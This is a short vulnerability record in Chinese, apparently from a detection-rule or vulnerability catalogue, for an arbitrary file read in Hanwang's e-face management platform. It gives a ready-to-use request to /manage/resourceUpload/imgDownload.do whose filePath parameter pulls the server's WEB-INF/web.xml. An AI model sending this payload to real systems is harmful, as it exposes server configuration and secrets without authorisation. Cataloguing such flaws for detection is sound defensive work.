vendor = "汉王"
name = "汉王e脸通综合管理平台 imgDownload.do 任意文件读取"
type = "任意文件读取"
version = "未知"
path = "/manage/resourceUpload/imgDownload.do"
detail = "/manage/resourceUpload/imgDownload.do?filePath=/manage/WEB-INF/web.xml&recoToken=SGUsqvF7cVS"
fix = "缺省规则可检出"
date = "0711"
label = "nday"
verifier = "AdySec"
